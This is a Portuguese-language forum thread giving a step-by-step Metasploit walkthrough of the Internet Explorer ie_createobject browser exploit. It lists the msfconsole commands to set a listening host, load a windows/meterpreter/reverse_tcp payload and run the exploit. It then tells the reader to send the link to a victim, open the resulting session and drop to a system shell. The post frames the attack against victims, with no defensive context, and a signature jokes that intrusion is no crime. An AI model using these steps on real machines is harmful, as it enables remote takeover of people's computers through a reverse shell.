Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Internet Explorer COM CreateObject Code Execution

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria Internet Explorer COM CreateObject Code Execution

    Metasploit Penetration Testing Framework

    Este módulo explora uma vulnerabilidade de execução genérica de código no Internet Explorer abusando de objetos Activex vulneráveis.
    Autor: areax
    Mais informações:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Abra sua Shell, e de o comando:
    root@bt:~#msfconsole
    Para abrir o MetaSploit
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Depois “show exploits” para exibir os exploits do MFS e procure por:
    Windows/browser/ie_createobject

    Feito isso vamos usar o comando “use” para definir o exploit que encontramos, segue abaixo o comando:
    Msf> use Windows/browser/ie_createobject
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Configurando o exploit:
    Siga os seguintes comando:

    msf exploit(ie_createobject) > show options
    (Esse comando exibe as opções do exploit)
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    msf exploit(ie_createobject) > set SRVHOST (Seu ip)
    (Esse comando define o ip de escuta.)
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Vamos definir agora o link do exploit, isso não é necessário, mas se quiser editar, siga o comando abaixo:
    msf exploit(ie_createobject) > set URIPATH teste
    Caso preferir, mude o nome "teste" por outro qualquer.

    Vamos agora carregar o payload, de o comando “show payloads” para exibir os payloads disponíveis:
    msf exploit(ie_createobject) > show payloads
    Procure por “windows/meterpreter/reverse_tcp", após ter encontrado, rode o seguinte comando:

    msf exploit(ie_createobject) > set payload windows/meterpreter/reverse_tcp
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Configurando o payload:
    Siga os seguintes comando:

    msf exploit(ie_createobject) > set LHOST (seu ip)
    (Esse comando define o Ip no qual a vítima irá se conectar, no caso o seu.)
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Tudo pronto, vamos agora rodar o exploit:
    msf exploit(ie_createobject) > exploit
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Perceba que o serve está rodando e o MSF criou um endereço para que a vítima acesse-o.

    PS: Veja que eu não usei o "URIPATH" do começo do tutorial, nisso o exploit definio o seguinte endereço:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Na máquina da vítima:
    Indique o link para que ela acessse:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Logo após de acessar a página o exploit já dá a resposta para o servidor, veja:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Repare que foi criado uma sessão no Meterpreter, para abri-lá de o seguinte comando:
    msf exploit(ie_createobject) > sessions --i 1
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Para ter acesso a shell do sistema rode o comando “shell”:
    Meterpreter > shell
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Simples e prático.



    areax@hotmail.com



    Similar Threads

  • Font Size
    #2
    Muito bom, cara. Só uma dúvida: pode dizer quais versões do IEquinha estão vulneráveis?
    Obrigado.
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

    Comment

    X
    Working...
    X